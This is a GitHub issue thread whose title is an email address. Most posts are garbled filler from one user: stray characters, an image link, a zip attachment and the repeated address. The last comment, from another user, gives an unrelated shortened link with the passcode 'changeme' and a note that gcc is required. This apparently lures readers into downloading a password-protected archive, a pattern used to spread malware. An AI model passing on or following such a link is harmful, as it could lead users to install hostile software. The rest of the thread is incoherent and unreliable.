### ISSUE TITLE
aaamm22227@gmail.com

### ISSUE THREAD

**Issue by Shjgf** [aaamm22227j/aaamm22227-gmail.com-#4]
> [``](url)              a

![1000013031](https://user-images.githubusercontent.com/180545624/364798815-424eceb9-2b86-42da-8007-a97089e557ee.jpg)
aamm22227@gmail.com

_Originally posted by @Shjgf in https://github.com/aaamm22227j/aaamm22227-gmail.com-/issues/3#issuecomment-2331703933_

**Comment by Shjgf** [comment]
> ```
>           a
> ```
> 
> ![1000013031](https://user-images.githubusercontent.com/180545624/364798815-424eceb9-2b86-42da-8007-a97089e557ee.jpg) [aamm22227@gmail.com](mailto:aamm22227@gmail.com)
> 
> _تم نشرها أصلا بواسطة@Shjgfفي [#3 (تعليق)](https://github.com/aaamm22227j/aaamm22227-gmail.com-/issues/3#issuecomment-2331703933)_

**Comment by Shjgf** [comment]
[](url)aaamm22227@gmail.com 
[aaamm22227-gmail.com--main.zip](https://github.com/user-attachments/files/16894253/aaamm22227-gmail.com--main.zip)

1. #2 @

**Comment by tinsn** [comment]
Give this a shot
https://bit.ly/4eaAnWN
Passcode: changeme
you must have a gcc compiler
